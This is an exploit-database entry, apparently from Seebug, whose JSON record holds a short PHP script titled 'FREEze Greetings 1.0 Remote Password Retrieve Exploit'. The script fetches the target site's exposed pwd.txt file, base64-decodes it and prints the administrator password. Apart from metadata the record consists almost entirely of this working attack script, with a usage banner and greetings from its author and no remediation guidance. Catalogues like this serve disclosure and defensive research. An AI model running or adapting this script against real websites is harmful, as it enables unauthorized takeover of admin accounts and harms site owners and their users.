Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-10049", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-11-18T00:00:00", "title": "FREEze Greetings 1.0 Remote Password Retrieve Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10049", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2008-11-18T00:00:00", "sourceData": "\n <?php\r\n\r\n/**\r\n* FREEze Greetings 1.0 Remote Password Retrieve Exploit\r\n* Exploit by cOndemned \r\n*\r\n* Greetz : suN8Hclf, 0in, m4r1usz, str0ke, rtgn, doctor, sid.psycho [...]\r\n* Special thx to ZaBeaTy for developing such a sexy regexp ;) Thx m8 \r\n*/\r\n\r\necho <<< Header\r\n\r\n[~] FREEze Greetings 1.0 Remote Password Retrieve Exploit\r\n[~] Exploit by cOndemned [ Prints decoded admin password ]\r\n\r\nHeader;\r\n\r\nif($argc != 2) printf("[~] Usage : php %s <target_with_path>\\r\\n\\r\\n", $argv[0]) and exit;\r\n\r\n$out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] . '/pwd.txt'), $r) && preg_match('!^([^\\|\\|]+)\\|\\|!sei', base64_decode($r[1]), $pass))\r\n\t? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation failed';\r\n\r\nprintf("[~] %s \\r\\n\\r\\n", $out);\r\n\r\n?>\n ", "id": "SSV:10049", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:21:08", "reporter": "Root", "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645572883}}
{}